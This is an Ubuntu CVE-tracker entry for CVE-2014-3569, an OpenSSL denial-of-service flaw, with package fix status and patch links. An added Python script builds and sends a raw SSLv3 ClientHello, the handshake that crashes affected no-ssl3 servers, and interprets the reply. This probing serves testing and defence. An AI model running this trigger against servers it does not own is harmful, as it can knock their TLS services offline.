CVE-2014-3569

Priority
Description
The ssl23_get_client_hello function in s23_srvr.c in OpenSSL 0.9.8zc,
1.0.0o, and 1.0.1j does not properly handle attempts to use unsupported
protocols, which allows remote attackers to cause a denial of service (NULL
pointer dereference and daemon crash) via an unexpected handshake, as
demonstrated by an SSLv3 handshake to a no-ssl3 application with certain
error handling. NOTE: this issue became relevant after the CVE-2014-3568
fix.
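The failure mode above is triggered by an ordinary SSLv3 ClientHello arriving at a server whose OpenSSL was built with no-ssl3. The script below is an added example (not code from the tracker, from Ubuntu or from OpenSSL) that builds such a ClientHello by hand and classifies what the server sends back: an SSLv3 ServerHello (the server still speaks SSLv3), an alert (the unsupported protocol was refused cleanly, which is the behaviour the 1.0.1k fix restores), or a connection that simply goes away, which is what a client sees when the daemon dies mid-handshake. The cipher-suite list, the alert-name table and the verdict strings are assumptions chosen for this example. Because the handshake is exactly the one the description says crashes an affected build, run `probe()` only against your own test instances.

```python
"""Probe how a TLS server answers an SSLv3 ClientHello (added example, Python 3)."""
import os
import socket
import struct

SSLV3 = b"\x03\x00"              # protocol version 3.0 in both record and handshake headers
CONTENT_HANDSHAKE = 0x16
CONTENT_ALERT = 0x15
HANDSHAKE_SERVER_HELLO = 0x02

# Suites an SSLv3-era client would plausibly offer (values from the TLS cipher suite registry).
# Assumed for this example: AES128-SHA, DES-CBC3-SHA, RC4-SHA.
DEFAULT_SUITES = (0x002F, 0x000A, 0x0005)

# Alert descriptions worth naming when classifying a refusal (RFC 6101 / RFC 5246 numbering).
ALERT_NAMES = {
    10: "unexpected_message",
    40: "handshake_failure",
    47: "illegal_parameter",
    50: "decode_error",
    70: "protocol_version",
}


def build_sslv3_client_hello(random_bytes=None, suites=DEFAULT_SUITES):
    """Return one SSLv3 record carrying a ClientHello.

    SSLv3 has no extensions block, so the body ends after the compression
    methods. Layout: record header (5) + handshake header (4) + body.
    """
    if random_bytes is None:
        random_bytes = os.urandom(32)
    if len(random_bytes) != 32:
        raise ValueError("ClientHello.random must be exactly 32 bytes")
    suite_bytes = b"".join(struct.pack("!H", s) for s in suites)
    body = (
        SSLV3                                            # client_version = 3.0
        + random_bytes                                   # random (32 bytes)
        + b"\x00"                                        # session_id length = 0
        + struct.pack("!H", len(suite_bytes)) + suite_bytes
        + b"\x01\x00"                                    # compression_methods = [null]
    )
    handshake = bytes([0x01]) + len(body).to_bytes(3, "big") + body   # type client_hello
    return bytes([CONTENT_HANDSHAKE]) + SSLV3 + struct.pack("!H", len(handshake)) + handshake


def classify_response(data):
    """Map the first bytes the server returned (possibly none) to a verdict string."""
    if not data:
        # EOF or RST before any record: either a deliberate drop or the daemon is gone.
        return "dropped"
    if len(data) < 5:
        return "garbage"
    content_type, _major, _minor, _length = struct.unpack("!BBBH", data[:5])
    if content_type == CONTENT_ALERT and len(data) >= 7:
        description = data[6]                            # data[5] is the alert level
        return "alert:%s" % ALERT_NAMES.get(description, str(description))
    if content_type == CONTENT_HANDSHAKE and len(data) >= 6 and data[5] == HANDSHAKE_SERVER_HELLO:
        return "sslv3_accepted"
    return "garbage"


def probe(host, port, timeout=5.0):
    """Send the ClientHello to host:port and classify the reply. Test instances only."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_sslv3_client_hello())
        try:
            data = sock.recv(4096)
        except ConnectionResetError:
            data = b""
        except socket.timeout:
            return "no_reply"
    return classify_response(data)


if __name__ == "__main__":
    import sys
    host, port = sys.argv[1], int(sys.argv[2])          # e.g. probe.py 127.0.0.1 4433
    print(probe(host, port))
```

Reading the verdicts: `alert:protocol_version` or `alert:handshake_failure` is the clean refusal a no-ssl3 build should give once fixed; `sslv3_accepted` means the build was not compiled with no-ssl3 at all (so this CVE does not apply, though the server is still offering SSLv3); `dropped` or `no_reply` is the pattern a crashed daemon produces, so check that the process is still running before concluding anything.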
Assigned-to
mdeslaur
Notes
mdeslaur: Ubuntu packages aren't compiled with no-ssl3, so aren't actually
vulnerable to this issue.
Package
Upstream:released (0.9.8zd, 1.0.1k)
Ubuntu 12.04 ESM (Precise Pangolin):released (1.0.1-4ubuntu5.21)
Ubuntu 14.04 ESM (Trusty Tahr):released (1.0.1f-1ubuntu2.8)
Ubuntu 16.04 LTS (Xenial Xerus):released (1.0.1f-1ubuntu10)
Ubuntu 18.04 LTS (Bionic Beaver):released (1.0.1f-1ubuntu10)
Patches:
Upstream:https://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=6ce9687b5aba5391fc0de50e18779eb676d0e04d (1.0.1)
Upstream:https://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=b82924741b4bd590da890619be671f4635e46c2b (0.9.8)
Package
Upstream:released (0.9.8o-4squeeze18)
Ubuntu 12.04 ESM (Precise Pangolin):DNE (precise was needed)
Ubuntu 14.04 ESM (Trusty Tahr):DNE (trusty was needed)
Ubuntu 16.04 LTS (Xenial Xerus):DNE
Ubuntu 18.04 LTS (Bionic Beaver):DNE
More Information

Updated: 2020-07-28 19:52:06 UTC (commit d26b6ca9f5b3adb89bb036ce73ae7dab894935ec)